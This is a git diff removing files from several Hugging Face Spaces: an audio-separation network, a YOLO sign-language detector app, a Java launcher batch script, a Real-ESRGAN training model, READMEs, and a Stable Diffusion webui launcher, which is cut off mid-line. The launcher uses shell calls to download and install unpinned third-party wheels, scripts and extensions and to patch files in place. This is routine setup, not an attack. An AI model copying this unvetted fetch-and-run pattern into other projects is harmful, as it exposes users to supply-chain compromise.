167d4cb2198863cf43e93440f7e63c5342fc7605..0000000000000000000000000000000000000000 --- a/spaces/LaynzKunz/Aesthetic_RVC_Inference_HF/lib/infer/infer_libs/uvr5_pack/lib_v5/nets_123821KB.py +++ /dev/null @@ -1,122 +0,0 @@ -import torch -import torch.nn.functional as F -from torch import nn - -from . import layers_123821KB as layers - - -class BaseASPPNet(nn.Module): - def __init__(self, nin, ch, dilations=(4, 8, 16)): - super(BaseASPPNet, self).__init__() - self.enc1 = layers.Encoder(nin, ch, 3, 2, 1) - self.enc2 = layers.Encoder(ch, ch * 2, 3, 2, 1) - self.enc3 = layers.Encoder(ch * 2, ch * 4, 3, 2, 1) - self.enc4 = layers.Encoder(ch * 4, ch * 8, 3, 2, 1) - - self.aspp = layers.ASPPModule(ch * 8, ch * 16, dilations) - - self.dec4 = layers.Decoder(ch * (8 + 16), ch * 8, 3, 1, 1) - self.dec3 = layers.Decoder(ch * (4 + 8), ch * 4, 3, 1, 1) - self.dec2 = layers.Decoder(ch * (2 + 4), ch * 2, 3, 1, 1) - self.dec1 = layers.Decoder(ch * (1 + 2), ch, 3, 1, 1) - - def __call__(self, x): - h, e1 = self.enc1(x) - h, e2 = self.enc2(h) - h, e3 = self.enc3(h) - h, e4 = self.enc4(h) - - h = self.aspp(h) - - h = self.dec4(h, e4) - h = self.dec3(h, e3) - h = self.dec2(h, e2) - h = self.dec1(h, e1) - - return h - - -class CascadedASPPNet(nn.Module): - def __init__(self, n_fft): - super(CascadedASPPNet, self).__init__() - self.stg1_low_band_net = BaseASPPNet(2, 32) - self.stg1_high_band_net = BaseASPPNet(2, 32) - - self.stg2_bridge = layers.Conv2DBNActiv(34, 16, 1, 1, 0) - self.stg2_full_band_net = BaseASPPNet(16, 32) - - self.stg3_bridge = layers.Conv2DBNActiv(66, 32, 1, 1, 0) - self.stg3_full_band_net = BaseASPPNet(32, 64) - - self.out = nn.Conv2d(64, 2, 1, bias=False) - self.aux1_out = nn.Conv2d(32, 2, 1, bias=False) - self.aux2_out = nn.Conv2d(32, 2, 1, bias=False) - - self.max_bin = n_fft // 2 - self.output_bin = n_fft // 2 + 1 - - self.offset = 128 - - def forward(self, x, aggressiveness=None): - mix = x.detach() - x = x.clone() - - x = x[:, :, : self.max_bin] - - bandw = x.size()[2] // 2 - aux1 = torch.cat( - [ - self.stg1_low_band_net(x[:, :, :bandw]), - self.stg1_high_band_net(x[:, :, bandw:]), - ], - dim=2, - ) - - h = torch.cat([x, aux1], dim=1) - aux2 = self.stg2_full_band_net(self.stg2_bridge(h)) - - h = torch.cat([x, aux1, aux2], dim=1) - h = self.stg3_full_band_net(self.stg3_bridge(h)) - - mask = torch.sigmoid(self.out(h)) - mask = F.pad( - input=mask, - pad=(0, 0, 0, self.output_bin - mask.size()[2]), - mode="replicate", - ) - - if self.training: - aux1 = torch.sigmoid(self.aux1_out(aux1)) - aux1 = F.pad( - input=aux1, - pad=(0, 0, 0, self.output_bin - aux1.size()[2]), - mode="replicate", - ) - aux2 = torch.sigmoid(self.aux2_out(aux2)) - aux2 = F.pad( - input=aux2, - pad=(0, 0, 0, self.output_bin - aux2.size()[2]), - mode="replicate", - ) - return mask * mix, aux1 * mix, aux2 * mix - else: - if aggressiveness: - mask[:, :, : aggressiveness["split_bin"]] = torch.pow( - mask[:, :, : aggressiveness["split_bin"]], - 1 + aggressiveness["value"] / 3, - ) - mask[:, :, aggressiveness["split_bin"] :] = torch.pow( - mask[:, :, aggressiveness["split_bin"] :], - 1 + aggressiveness["value"], - ) - - return mask * mix - - def predict(self, x_mag, aggressiveness=None): - h = self.forward(x_mag, aggressiveness) - - if self.offset > 0: - h = h[:, :, :, self.offset : -self.offset] - assert h.size()[3] > 0 - - return h diff --git a/spaces/LeoDog896/yolov8n-asl/app.py b/spaces/LeoDog896/yolov8n-asl/app.py deleted file mode 100644 index 605652d9fe091bea928683d874705467ec2894c1..0000000000000000000000000000000000000000 --- a/spaces/LeoDog896/yolov8n-asl/app.py +++ /dev/null @@ -1,100 +0,0 @@ -import gradio as gr -import cv2 - -from ultralytics import YOLO - -model = YOLO('best.pt') - -def show_preds_image(image_path): - image = cv2.imread(image_path) - outputs = model.predict(source=image_path) - results = outputs[0].cpu().numpy() - for i, det in enumerate(results.boxes.xyxy): - id = results.boxes.cls[i] - name = model.names[id] - - #draw box around name - cv2.rectangle( - image, - (int(det[0]), int(det[1])), - (int(det[0]) + len(name) * 20, int(det[1]) - 30), - color=(0, 0, 255), - thickness=-1, - lineType=cv2.LINE_AA - ) - - # draw name - cv2.putText( - image, - str(name), - (int(det[0]), int(det[1]) - 5), - cv2.FONT_HERSHEY_SIMPLEX, - 1, - (255, 255, 255), - 2, - cv2.LINE_AA - ) - - # draw box - cv2.rectangle( - image, - (int(det[0]), int(det[1])), - (int(det[2]), int(det[3])), - color=(0, 0, 255), - thickness=2, - lineType=cv2.LINE_AA - ) - return cv2.cvtColor(image, cv2.COLOR_BGR2RGB) - -inputs_image = [ - gr.components.Image(type="filepath", label="Input Image"), -] -outputs_image = [ - gr.components.Image(type="numpy", label="Output Image"), -] -interface_image = gr.Interface( - fn=show_preds_image, - inputs=inputs_image, - outputs=outputs_image, - title="ASL detector", - cache_examples=False, -) - -def show_preds_video(video_path): - cap = cv2.VideoCapture(video_path) - while(cap.isOpened()): - ret, frame = cap.read() - if ret: - frame_copy = frame.copy() - outputs = model.predict(source=frame) - results = outputs[0].cpu().numpy() - for i, det in enumerate(results.boxes.xyxy): - cv2.rectangle( - frame_copy, - (int(det[0]), int(det[1])), - (int(det[2]), int(det[3])), - color=(0, 0, 255), - thickness=2, - lineType=cv2.LINE_AA - ) - yield cv2.cvtColor(frame_copy, cv2.COLOR_BGR2RGB) - -inputs_video = [ - gr.components.Video(type="filepath", label="Input Video"), - -] -outputs_video = [ - gr.components.Image(type="numpy", label="Output Image"), -] -interface_video = gr.Interface( - fn=show_preds_video, - inputs=inputs_video, - outputs=outputs_video, - title="ASL detector", - cache_examples=False, -) - -gr.TabbedInterface( - [interface_image, interface_video], - tab_names=['Image inference', 'Video inference'] -).queue().launch() \ No newline at end of file diff --git a/spaces/Lianguangluowuyan/QQsign/bin/unidbg-fetch-qsign.bat b/spaces/Lianguangluowuyan/QQsign/bin/unidbg-fetch-qsign.bat deleted file mode 100644 index 8b291e7303b0c07d14b714e5795473891363c85b..0000000000000000000000000000000000000000 --- a/spaces/Lianguangluowuyan/QQsign/bin/unidbg-fetch-qsign.bat +++ /dev/null @@ -1,89 +0,0 @@ -@rem -@rem Copyright 2015 the original author or authors. -@rem -@rem Licensed under the Apache License, Version 2.0 (the "License"); -@rem you may not use this file except in compliance with the License. -@rem You may obtain a copy of the License at -@rem -@rem https://www.apache.org/licenses/LICENSE-2.0 -@rem -@rem Unless required by applicable law or agreed to in writing, software -@rem distributed under the License is distributed on an "AS IS" BASIS, -@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -@rem See the License for the specific language governing permissions and -@rem limitations under the License. -@rem - -@if "%DEBUG%" == "" @echo off -@rem ########################################################################## -@rem -@rem unidbg-fetch-qsign startup script for Windows -@rem -@rem ########################################################################## - -@rem Set local scope for the variables with windows NT shell -if "%OS%"=="Windows_NT" setlocal - -set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. -set APP_BASE_NAME=%~n0 -set APP_HOME=%DIRNAME%.. - -@rem Resolve any "." and ".." in APP_HOME to make it shorter. -for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi - -@rem Add default JVM options here. You can also use JAVA_OPTS and UNIDBG_FETCH_QSIGN_OPTS to pass JVM options to this script. -set DEFAULT_JVM_OPTS= - -@rem Find java.exe -if defined JAVA_HOME goto findJavaFromJavaHome - -set JAVA_EXE=java.exe -%JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto execute - -echo. -echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. -echo. -echo Please set the JAVA_HOME variable in your environment to match the -echo location of your Java installation. - -goto fail - -:findJavaFromJavaHome -set JAVA_HOME=%JAVA_HOME:"=% -set JAVA_EXE=%JAVA_HOME%/bin/java.exe - -if exist "%JAVA_EXE%" goto execute - -echo. -echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% -echo. -echo Please set the JAVA_HOME variable in your environment to match the -echo location of your Java installation. - -goto fail - -:execute -@rem Setup the command line - -set CLASSPATH=%APP_HOME%\lib\unidbg-fetch-qsign-1.1.9.jar;%APP_HOME%\lib\unidbg-android-105.jar;%APP_HOME%\lib\ktor-server-content-negotiation-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-serialization-kotlinx-json-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-server-status-pages-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-server-netty-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-server-host-common-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-server-core-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-serialization-kotlinx-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-serialization-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-events-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-websockets-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-http-cio-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-http-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-network-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-utils-jvm-2.3.1.jar;%APP_HOME%\lib\ktor-io-jvm-2.3.1.jar;%APP_HOME%\lib\kotlin-stdlib-jdk8-1.8.22.jar;%APP_HOME%\lib\kotlinx-serialization-json-jvm-1.5.1.jar;%APP_HOME%\lib\kotlinx-serialization-protobuf-jvm-1.5.1.jar;%APP_HOME%\lib\kotlinx-serialization-core-jvm-1.5.1.jar;%APP_HOME%\lib\logback-classic-1.2.11.jar;%APP_HOME%\lib\kotlinx-coroutines-jdk8-1.7.1.jar;%APP_HOME%\lib\kotlinx-coroutines-core-jvm-1.7.1.jar;%APP_HOME%\lib\kotlin-stdlib-jdk7-1.8.22.jar;%APP_HOME%\lib\kotlin-reflect-1.8.10.jar;%APP_HOME%\lib\kotlin-stdlib-1.8.22.jar;%APP_HOME%\lib\slf4j-api-1.7.36.jar;%APP_HOME%\lib\kotlin-stdlib-common-1.8.22.jar;%APP_HOME%\lib\config-1.4.2.jar;%APP_HOME%\lib\jansi-2.4.0.jar;%APP_HOME%\lib\netty-codec-http2-4.1.92.Final.jar;%APP_HOME%\lib\alpn-api-1.1.3.v20160715.jar;%APP_HOME%\lib\netty-transport-native-kqueue-4.1.92.Final.jar;%APP_HOME%\lib\netty-transport-native-epoll-4.1.92.Final.jar;%APP_HOME%\lib\logback-core-1.2.11.jar;%APP_HOME%\lib\annotations-23.0.0.jar;%APP_HOME%\lib\netty-codec-http-4.1.92.Final.jar;%APP_HOME%\lib\netty-handler-4.1.92.Final.jar;%APP_HOME%\lib\netty-codec-4.1.92.Final.jar;%APP_HOME%\lib\netty-transport-classes-kqueue-4.1.92.Final.jar;%APP_HOME%\lib\netty-transport-classes-epoll-4.1.92.Final.jar;%APP_HOME%\lib\netty-transport-native-unix-common-4.1.92.Final.jar;%APP_HOME%\lib\netty-transport-4.1.92.Final.jar;%APP_HOME%\lib\netty-buffer-4.1.92.Final.jar;%APP_HOME%\lib\netty-resolver-4.1.92.Final.jar;%APP_HOME%\lib\netty-common-4.1.92.Final.jar - - -@rem Execute unidbg-fetch-qsign -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %UNIDBG_FETCH_QSIGN_OPTS% -classpath "%CLASSPATH%" MainKt %* - -:end -@rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd - -:fail -rem Set variable UNIDBG_FETCH_QSIGN_EXIT_CONSOLE if you need the _script_ return code instead of -rem the _cmd.exe /c_ return code! -if not "" == "%UNIDBG_FETCH_QSIGN_EXIT_CONSOLE%" exit 1 -exit /b 1 - -:mainEnd -if "%OS%"=="Windows_NT" endlocal - -:omega diff --git a/spaces/LittleYuan/My-Real-Bot/realesrgan/models/realesrgan_model.py b/spaces/LittleYuan/My-Real-Bot/realesrgan/models/realesrgan_model.py deleted file mode 100644 index c298a09c42433177f90001a0a31d029576072ccd..0000000000000000000000000000000000000000 --- a/spaces/LittleYuan/My-Real-Bot/realesrgan/models/realesrgan_model.py +++ /dev/null @@ -1,258 +0,0 @@ -import numpy as np -import random -import torch -from basicsr.data.degradations import random_add_gaussian_noise_pt, random_add_poisson_noise_pt -from basicsr.data.transforms import paired_random_crop -from basicsr.models.srgan_model import SRGANModel -from basicsr.utils import DiffJPEG, USMSharp -from basicsr.utils.img_process_util import filter2D -from basicsr.utils.registry import MODEL_REGISTRY -from collections import OrderedDict -from torch.nn import functional as F - - -@MODEL_REGISTRY.register() -class RealESRGANModel(SRGANModel): - """RealESRGAN Model for Real-ESRGAN: Training Real-World Blind Super-Resolution with Pure Synthetic Data. - - It mainly performs: - 1. randomly synthesize LQ images in GPU tensors - 2. optimize the networks with GAN training. - """ - - def __init__(self, opt): - super(RealESRGANModel, self).__init__(opt) - self.jpeger = DiffJPEG(differentiable=False).cuda() # simulate JPEG compression artifacts - self.usm_sharpener = USMSharp().cuda() # do usm sharpening - self.queue_size = opt.get('queue_size', 180) - - @torch.no_grad() - def _dequeue_and_enqueue(self): - """It is the training pair pool for increasing the diversity in a batch. - - Batch processing limits the diversity of synthetic degradations in a batch. For example, samples in a - batch could not have different resize scaling factors. Therefore, we employ this training pair pool - to increase the degradation diversity in a batch. - """ - # initialize - b, c, h, w = self.lq.size() - if not hasattr(self, 'queue_lr'): - assert self.queue_size % b == 0, f'queue size {self.queue_size} should be divisible by batch size {b}' - self.queue_lr = torch.zeros(self.queue_size, c, h, w).cuda() - _, c, h, w = self.gt.size() - self.queue_gt = torch.zeros(self.queue_size, c, h, w).cuda() - self.queue_ptr = 0 - if self.queue_ptr == self.queue_size: # the pool is full - # do dequeue and enqueue - # shuffle - idx = torch.randperm(self.queue_size) - self.queue_lr = self.queue_lr[idx] - self.queue_gt = self.queue_gt[idx] - # get first b samples - lq_dequeue = self.queue_lr[0:b, :, :, :].clone() - gt_dequeue = self.queue_gt[0:b, :, :, :].clone() - # update the queue - self.queue_lr[0:b, :, :, :] = self.lq.clone() - self.queue_gt[0:b, :, :, :] = self.gt.clone() - - self.lq = lq_dequeue - self.gt = gt_dequeue - else: - # only do enqueue - self.queue_lr[self.queue_ptr:self.queue_ptr + b, :, :, :] = self.lq.clone() - self.queue_gt[self.queue_ptr:self.queue_ptr + b, :, :, :] = self.gt.clone() - self.queue_ptr = self.queue_ptr + b - - @torch.no_grad() - def feed_data(self, data): - """Accept data from dataloader, and then add two-order degradations to obtain LQ images. - """ - if self.is_train and self.opt.get('high_order_degradation', True): - # training data synthesis - self.gt = data['gt'].to(self.device) - self.gt_usm = self.usm_sharpener(self.gt) - - self.kernel1 = data['kernel1'].to(self.device) - self.kernel2 = data['kernel2'].to(self.device) - self.sinc_kernel = data['sinc_kernel'].to(self.device) - - ori_h, ori_w = self.gt.size()[2:4] - - # ----------------------- The first degradation process ----------------------- # - # blur - out = filter2D(self.gt_usm, self.kernel1) - # random resize - updown_type = random.choices(['up', 'down', 'keep'], self.opt['resize_prob'])[0] - if updown_type == 'up': - scale = np.random.uniform(1, self.opt['resize_range'][1]) - elif updown_type == 'down': - scale = np.random.uniform(self.opt['resize_range'][0], 1) - else: - scale = 1 - mode = random.choice(['area', 'bilinear', 'bicubic']) - out = F.interpolate(out, scale_factor=scale, mode=mode) - # add noise - gray_noise_prob = self.opt['gray_noise_prob'] - if np.random.uniform() < self.opt['gaussian_noise_prob']: - out = random_add_gaussian_noise_pt( - out, sigma_range=self.opt['noise_range'], clip=True, rounds=False, gray_prob=gray_noise_prob) - else: - out = random_add_poisson_noise_pt( - out, - scale_range=self.opt['poisson_scale_range'], - gray_prob=gray_noise_prob, - clip=True, - rounds=False) - # JPEG compression - jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range']) - out = torch.clamp(out, 0, 1) # clamp to [0, 1], otherwise JPEGer will result in unpleasant artifacts - out = self.jpeger(out, quality=jpeg_p) - - # ----------------------- The second degradation process ----------------------- # - # blur - if np.random.uniform() < self.opt['second_blur_prob']: - out = filter2D(out, self.kernel2) - # random resize - updown_type = random.choices(['up', 'down', 'keep'], self.opt['resize_prob2'])[0] - if updown_type == 'up': - scale = np.random.uniform(1, self.opt['resize_range2'][1]) - elif updown_type == 'down': - scale = np.random.uniform(self.opt['resize_range2'][0], 1) - else: - scale = 1 - mode = random.choice(['area', 'bilinear', 'bicubic']) - out = F.interpolate( - out, size=(int(ori_h / self.opt['scale'] * scale), int(ori_w / self.opt['scale'] * scale)), mode=mode) - # add noise - gray_noise_prob = self.opt['gray_noise_prob2'] - if np.random.uniform() < self.opt['gaussian_noise_prob2']: - out = random_add_gaussian_noise_pt( - out, sigma_range=self.opt['noise_range2'], clip=True, rounds=False, gray_prob=gray_noise_prob) - else: - out = random_add_poisson_noise_pt( - out, - scale_range=self.opt['poisson_scale_range2'], - gray_prob=gray_noise_prob, - clip=True, - rounds=False) - - # JPEG compression + the final sinc filter - # We also need to resize images to desired sizes. We group [resize back + sinc filter] together - # as one operation. - # We consider two orders: - # 1. [resize back + sinc filter] + JPEG compression - # 2. JPEG compression + [resize back + sinc filter] - # Empirically, we find other combinations (sinc + JPEG + Resize) will introduce twisted lines. - if np.random.uniform() < 0.5: - # resize back + the final sinc filter - mode = random.choice(['area', 'bilinear', 'bicubic']) - out = F.interpolate(out, size=(ori_h // self.opt['scale'], ori_w // self.opt['scale']), mode=mode) - out = filter2D(out, self.sinc_kernel) - # JPEG compression - jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range2']) - out = torch.clamp(out, 0, 1) - out = self.jpeger(out, quality=jpeg_p) - else: - # JPEG compression - jpeg_p = out.new_zeros(out.size(0)).uniform_(*self.opt['jpeg_range2']) - out = torch.clamp(out, 0, 1) - out = self.jpeger(out, quality=jpeg_p) - # resize back + the final sinc filter - mode = random.choice(['area', 'bilinear', 'bicubic']) - out = F.interpolate(out, size=(ori_h // self.opt['scale'], ori_w // self.opt['scale']), mode=mode) - out = filter2D(out, self.sinc_kernel) - - # clamp and round - self.lq = torch.clamp((out * 255.0).round(), 0, 255) / 255. - - # random crop - gt_size = self.opt['gt_size'] - (self.gt, self.gt_usm), self.lq = paired_random_crop([self.gt, self.gt_usm], self.lq, gt_size, - self.opt['scale']) - - # training pair pool - self._dequeue_and_enqueue() - # sharpen self.gt again, as we have changed the self.gt with self._dequeue_and_enqueue - self.gt_usm = self.usm_sharpener(self.gt) - self.lq = self.lq.contiguous() # for the warning: grad and param do not obey the gradient layout contract - else: - # for paired training or validation - self.lq = data['lq'].to(self.device) - if 'gt' in data: - self.gt = data['gt'].to(self.device) - self.gt_usm = self.usm_sharpener(self.gt) - - def nondist_validation(self, dataloader, current_iter, tb_logger, save_img): - # do not use the synthetic process during validation - self.is_train = False - super(RealESRGANModel, self).nondist_validation(dataloader, current_iter, tb_logger, save_img) - self.is_train = True - - def optimize_parameters(self, current_iter): - # usm sharpening - l1_gt = self.gt_usm - percep_gt = self.gt_usm - gan_gt = self.gt_usm - if self.opt['l1_gt_usm'] is False: - l1_gt = self.gt - if self.opt['percep_gt_usm'] is False: - percep_gt = self.gt - if self.opt['gan_gt_usm'] is False: - gan_gt = self.gt - - # optimize net_g - for p in self.net_d.parameters(): - p.requires_grad = False - - self.optimizer_g.zero_grad() - self.output = self.net_g(self.lq) - - l_g_total = 0 - loss_dict = OrderedDict() - if (current_iter % self.net_d_iters == 0 and current_iter > self.net_d_init_iters): - # pixel loss - if self.cri_pix: - l_g_pix = self.cri_pix(self.output, l1_gt) - l_g_total += l_g_pix - loss_dict['l_g_pix'] = l_g_pix - # perceptual loss - if self.cri_perceptual: - l_g_percep, l_g_style = self.cri_perceptual(self.output, percep_gt) - if l_g_percep is not None: - l_g_total += l_g_percep - loss_dict['l_g_percep'] = l_g_percep - if l_g_style is not None: - l_g_total += l_g_style - loss_dict['l_g_style'] = l_g_style - # gan loss - fake_g_pred = self.net_d(self.output) - l_g_gan = self.cri_gan(fake_g_pred, True, is_disc=False) - l_g_total += l_g_gan - loss_dict['l_g_gan'] = l_g_gan - - l_g_total.backward() - self.optimizer_g.step() - - # optimize net_d - for p in self.net_d.parameters(): - p.requires_grad = True - - self.optimizer_d.zero_grad() - # real - real_d_pred = self.net_d(gan_gt) - l_d_real = self.cri_gan(real_d_pred, True, is_disc=True) - loss_dict['l_d_real'] = l_d_real - loss_dict['out_d_real'] = torch.mean(real_d_pred.detach()) - l_d_real.backward() - # fake - fake_d_pred = self.net_d(self.output.detach().clone()) # clone for pt1.9 - l_d_fake = self.cri_gan(fake_d_pred, False, is_disc=True) - loss_dict['l_d_fake'] = l_d_fake - loss_dict['out_d_fake'] = torch.mean(fake_d_pred.detach()) - l_d_fake.backward() - self.optimizer_d.step() - - if self.ema_decay > 0: - self.model_ema(decay=self.ema_decay) - - self.log_dict = self.reduce_loss_dict(loss_dict) diff --git a/spaces/Luccadraw24/Amelia/README.md b/spaces/Luccadraw24/Amelia/README.md deleted file mode 100644 index e477242cc9fbfdc03697bdf4e65c8d6620b1bbb5..0000000000000000000000000000000000000000 --- a/spaces/Luccadraw24/Amelia/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: Amelia -emoji: 📚 -colorFrom: green -colorTo: green -sdk: docker -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Luelll/ChuanhuChatGPT/README.md b/spaces/Luelll/ChuanhuChatGPT/README.md deleted file mode 100644 index fb163c90d56e9cf816c2d11dbd43871e776a9fc3..0000000000000000000000000000000000000000 --- a/spaces/Luelll/ChuanhuChatGPT/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: ChuanhuChatGPT -emoji: 🐯 -colorFrom: green -colorTo: red -sdk: gradio -sdk_version: 3.28.0 -app_file: ChuanhuChatbot.py -pinned: false -license: gpl-3.0 -duplicated_from: JohnSmith9982/ChuanhuChatGPT ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/Lykon/NeverEnding-Dream-webui/app.py b/spaces/Lykon/NeverEnding-Dream-webui/app.py deleted file mode 100644 index c4b5de0d1ac307c8c03ee4c48b4a3760fad264cf..0000000000000000000000000000000000000000 --- a/spaces/Lykon/NeverEnding-Dream-webui/app.py +++ /dev/null @@ -1,72 +0,0 @@ -import os -from subprocess import getoutput - -gpu_info = getoutput('nvidia-smi') -if("A10G" in gpu_info): - os.system(f"pip install -q https://github.com/camenduru/stable-diffusion-webui-colab/releases/download/0.0.15/xformers-0.0.15.dev0+4c06c79.d20221205-cp38-cp38-linux_x86_64.whl") -elif("T4" in gpu_info): - os.system(f"pip install -q https://github.com/camenduru/stable-diffusion-webui-colab/releases/download/0.0.15/xformers-0.0.15.dev0+1515f77.d20221130-cp38-cp38-linux_x86_64.whl") - -os.system(f"git clone -b v1.5 https://github.com/camenduru/stable-diffusion-webui /home/user/app/stable-diffusion-webui") -os.chdir("/home/user/app/stable-diffusion-webui") - -os.system(f"wget -q https://github.com/camenduru/webui/raw/main/env_patch.py -O /home/user/app/env_patch.py") -os.system(f"sed -i '$a fastapi==0.90.0' /home/user/app/stable-diffusion-webui/requirements_versions.txt") -os.system(f"sed -i -e '/import image_from_url_text/r /home/user/app/env_patch.py' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f"sed -i -e '/(modelmerger_interface, \"Checkpoint Merger\", \"modelmerger\"),/d' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f"sed -i -e '/(train_interface, \"Train\", \"ti\"),/d' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f"sed -i -e '/extensions_interface, \"Extensions\", \"extensions\"/d' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f"sed -i -e '/settings_interface, \"Settings\", \"settings\"/d' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f'''sed -i -e "s/document.getElementsByTagName('gradio-app')\[0\].shadowRoot/!!document.getElementsByTagName('gradio-app')[0].shadowRoot ? document.getElementsByTagName('gradio-app')[0].shadowRoot : document/g" /home/user/app/stable-diffusion-webui/script.js''') -os.system(f"sed -i -e 's/ show_progress=False,/ show_progress=True,/g' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f"sed -i -e 's/shared.demo.launch/shared.demo.queue().launch/g' /home/user/app/stable-diffusion-webui/webui.py") -os.system(f"sed -i -e 's/ outputs=\[/queue=False, &/g' /home/user/app/stable-diffusion-webui/modules/ui.py") -os.system(f"sed -i -e 's/ queue=False, / /g' /home/user/app/stable-diffusion-webui/modules/ui.py") - - -if "IS_SHARED_UI" in os.environ: - os.system(f"rm -rfv /home/user/app/stable-diffusion-webui/scripts/") - - os.system(f"wget -q https://github.com/camenduru/webui/raw/main/shared-config.json -O /home/user/app/shared-config.json") - os.system(f"wget -q https://github.com/camenduru/webui/raw/main/shared-ui-config.json -O /home/user/app/shared-ui-config.json") - - # os.system(f"wget -q https://huggingface.co/ckpt/anything-v3-vae-swapped/resolve/main/anything-v3-vae-swapped.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/anything-v3-vae-swapped.ckpt") - # os.system(f"wget -q {os.getenv('MODEL_LINK')} -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/{os.getenv('MODEL_NAME')}") - # os.system(f"wget -q {os.getenv('VAE_LINK')} -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/{os.getenv('VAE_NAME')}") - # os.system(f"wget -q {os.getenv('YAML_LINK')} -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/{os.getenv('YAML_NAME')}") - os.system(f"wget -q https://huggingface.co/Lykon/DreamShaper/resolve/main/DreamShaper_3.3_baked_vae.safetensors -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/DreamShaper_3.3_baked_vae.safetensors") - os.system(f"wget -q https://huggingface.co/Lykon/DreamShaper/resolve/main/Dreamshaper_3.32_baked_vae_clip_fix.safetensors -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/Dreamshaper_3.32_baked_vae_clip_fix.safetensors") - - os.system(f"python launch.py --force-enable-xformers --disable-console-progressbars --enable-console-prompts --ui-config-file /home/user/app/shared-ui-config.json --ui-settings-file /home/user/app/shared-config.json --cors-allow-origins huggingface.co,hf.space --no-progressbar-hiding") -else: - # Please duplicate this space and delete # character in front of the custom script you want to use or add here more custom scripts with same structure os.system(f"wget -q https://CUSTOM_SCRIPT_URL -O /home/user/app/stable-diffusion-webui/scripts/CUSTOM_SCRIPT_NAME.py") - os.system(f"wget -q https://gist.github.com/camenduru/9ec5f8141db9902e375967e93250860f/raw/d0bcf01786f20107c329c03f8968584ee67be12a/run_n_times.py -O /home/user/app/stable-diffusion-webui/scripts/run_n_times.py") - - # Please duplicate this space and delete # character in front of the extension you want to use or add here more extensions with same structure os.system(f"git clone https://EXTENSION_GIT_URL /home/user/app/stable-diffusion-webui/extensions/EXTENSION_NAME") - #os.system(f"git clone https://github.com/camenduru/stable-diffusion-webui-artists-to-study /home/user/app/stable-diffusion-webui/extensions/stable-diffusion-webui-artists-to-study") - os.system(f"git clone https://github.com/yfszzx/stable-diffusion-webui-images-browser /home/user/app/stable-diffusion-webui/extensions/stable-diffusion-webui-images-browser") - os.system(f"git clone https://github.com/camenduru/deforum-for-automatic1111-webui /home/user/app/stable-diffusion-webui/extensions/deforum-for-automatic1111-webui") - - # Please duplicate this space and delete # character in front of the model you want to use or add here more ckpts with same structure os.system(f"wget -q https://CKPT_URL -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/CKPT_NAME.ckpt") - #os.system(f"wget -q https://huggingface.co/nitrosocke/Arcane-Diffusion/resolve/main/arcane-diffusion-v3.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/arcane-diffusion-v3.ckpt") - #os.system(f"wget -q https://huggingface.co/DGSpitzer/Cyberpunk-Anime-Diffusion/resolve/main/Cyberpunk-Anime-Diffusion.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/Cyberpunk-Anime-Diffusion.ckpt") - #os.system(f"wget -q https://huggingface.co/prompthero/midjourney-v4-diffusion/resolve/main/mdjrny-v4.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/mdjrny-v4.ckpt") - #os.system(f"wget -q https://huggingface.co/nitrosocke/mo-di-diffusion/resolve/main/moDi-v1-pruned.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/moDi-v1-pruned.ckpt") - #os.system(f"wget -q https://huggingface.co/Fictiverse/Stable_Diffusion_PaperCut_Model/resolve/main/PaperCut_v1.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/PaperCut_v1.ckpt") - #os.system(f"wget -q https://huggingface.co/lilpotat/sa/resolve/main/samdoesarts_style.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/samdoesarts_style.ckpt") - #os.system(f"wget -q https://huggingface.co/hakurei/waifu-diffusion-v1-3/resolve/main/wd-v1-3-float32.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/wd-v1-3-float32.ckpt") - #os.system(f"wget -q https://huggingface.co/CompVis/stable-diffusion-v-1-4-original/resolve/main/sd-v1-4.ckpt -O /home/user/app/stable-diffusion-webui/models/Stable-diffusion/sd-v1-4.ckpt") - #os.system(f"wget -q 